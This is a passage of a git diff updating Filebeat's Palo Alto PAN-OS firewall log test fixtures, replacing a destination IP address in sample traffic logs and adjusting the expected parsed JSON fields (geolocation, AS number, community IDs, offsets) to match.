04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 
1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json
index 2a330cd36949..f8a6b70213fb 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json
@@ -6,19 +6,15 @@
 "client.packets": 1,
 "client.port": 59324,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -31,7 +27,7 @@
 "event.end": "2012-04-10T04:39:59.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:59.000-02:00",
 "event.timezone": "-02:00",
@@ -46,7 +42,7 @@
 "log.offset": 0,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:MaqerLAYuvMg6JWjWKmIMO6QJ6s=",
+ "network.community_id": "1:OS2Ubhid3OLGrPLNmOkR1m08mU0=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -78,14 +74,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -109,14 +105,7 @@
 "client.port": 54448,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -142,7 +131,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 364,
+ "log.offset": 362,
 "network.application": "dns",
 "network.bytes": 76,
 "network.community_id": "1:rmRctS0ZS56Ixay3V5beNERhPNc=",
@@ -208,14 +197,7 @@
 "client.port": 53121,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -241,7 +223,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 717,
+ "log.offset": 715,
 "network.application": "dns",
 "network.bytes": 76,
 "network.community_id": "1:NmeRH4O3xNBaUjzIOpdGXeAJ/sg=",
@@ -306,19 +288,15 @@
 "client.packets": 1,
 "client.port": 59323,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -331,7 +309,7 @@
 "event.end": "2012-04-10T04:39:58.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:58.000-02:00",
 "event.timezone": "-02:00",
@@ -343,10 +321,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 1070,
+ "log.offset": 1068,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:ej/0QPUwuraByxuNxWsOp2ouPuE=",
+ "network.community_id": "1:r5Rh3xb027aSYQ6qFvtpERnQwLs=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -378,14 +356,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -408,19 +386,15 @@
 "client.packets": 1,
 "client.port": 59322,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -433,7 +407,7 @@
 "event.end": "2012-04-10T04:39:58.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:58.000-02:00",
 "event.timezone": "-02:00",
@@ -445,10 +419,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 1434,
+ "log.offset": 1430,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:XHKuVPA6enGOr0Qng8AJtYTgWAQ=",
+ "network.community_id": "1:mEVZ19gViqVgBuPhb2ArUOJD3vw=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -480,14 +454,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -511,14 +485,7 @@
 "client.port": 55766,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -544,7 +511,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 1798,
+ "log.offset": 1792,
 "network.application": "dns",
 "network.bytes": 74,
 "network.community_id": "1:bkpOCSg/r3P7zn1eVdfrSSHQMn0=",
@@ -610,14 +577,7 @@
 "client.port": 55072,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -643,7 +603,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 2151,
+ "log.offset": 2145,
 "network.application": "dns",
 "network.bytes": 74,
 "network.community_id": "1:f08UBDqcNW5jC3R+i40XfD1g8l8=",
@@ -708,19 +668,15 @@
 "client.packets": 6,
 "client.port": 59207,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 806,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 4,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -733,7 +689,7 @@
 "event.end": "2012-04-10T04:39:28.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:27.000-02:00",
 "event.timezone": "-02:00",
@@ -745,10 +701,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 2504,
+ "log.offset": 2498,
 "network.application": "web-browsing",
 "network.bytes": 1355,
- "network.community_id": "1:kGyE7FdnFLrk4Cc6NHaD5WeE81A=",
+ "network.community_id": "1:zWPCOPDweVvFNBQjBcevkW/4xkk=",
 "network.direction": "outbound",
 "network.packets": 10,
 "network.transport": "tcp",
@@ -780,14 +736,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 806,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 4,
 "server.port": 80,
 "service.type": "panw",
@@ -810,19 +766,15 @@
 "client.packets": 6,
 "client.port": 59209,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 806,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 4,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -835,7 +787,7 @@
 "event.end": "2012-04-10T04:39:28.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:28.000-02:00",
 "event.timezone": "-02:00",
@@ -847,10 +799,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 2889,
+ "log.offset": 2881,
 "network.application": "web-browsing",
 "network.bytes": 1355,
- "network.community_id": "1:pxN/AvFcFozLjRgniFdZmScORYQ=",
+ "network.community_id": "1:M0wX7T9OlwBxAVwvoOBXz/ItDAU=",
 "network.direction": "outbound",
 "network.packets": 10,
 "network.transport": "tcp",
@@ -882,14 +834,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 806,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 4,
 "server.port": 80,
 "service.type": "panw",
@@ -912,19 +864,15 @@
 "client.packets": 6,
 "client.port": 59208,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 806,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 4,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -937,7 +885,7 @@
 "event.end": "2012-04-10T04:39:28.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:27.000-02:00",
 "event.timezone": "-02:00",
@@ -949,10 +897,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 3274,
+ "log.offset": 3264,
 "network.application": "web-browsing",
 "network.bytes": 1355,
- "network.community_id": "1:HmuQtYxq+NpgJ0zVEIpz7zLNOKM=",
+ "network.community_id": "1:4KyZ6yta5GEc2tteXzHowX+7VyU=",
 "network.direction": "outbound",
 "network.packets": 10,
 "network.transport": "tcp",
@@ -984,14 +932,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 806,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 4,
 "server.port": 80,
 "service.type": "panw",
@@ -1014,19 +962,15 @@
 "client.packets": 1,
 "client.port": 59318,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -1039,7 +983,7 @@
 "event.end": "2012-04-10T04:39:58.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:58.000-02:00",
 "event.timezone": "-02:00",
@@ -1051,10 +995,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 3659,
+ "log.offset": 3647,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:I7NZAEypUvCTVa5iVWyAsWeEWgY=",
+ "network.community_id": "1:MSgzPne+izDvzh8WO4tIRsclc64=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -1086,14 +1030,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -1116,19 +1060,15 @@
 "client.packets": 1,
 "client.port": 59317,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -1141,7 +1081,7 @@
 "event.end": "2012-04-10T04:39:57.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:57.000-02:00",
 "event.timezone": "-02:00",
@@ -1153,10 +1093,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 4023,
+ "log.offset": 4009,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=",
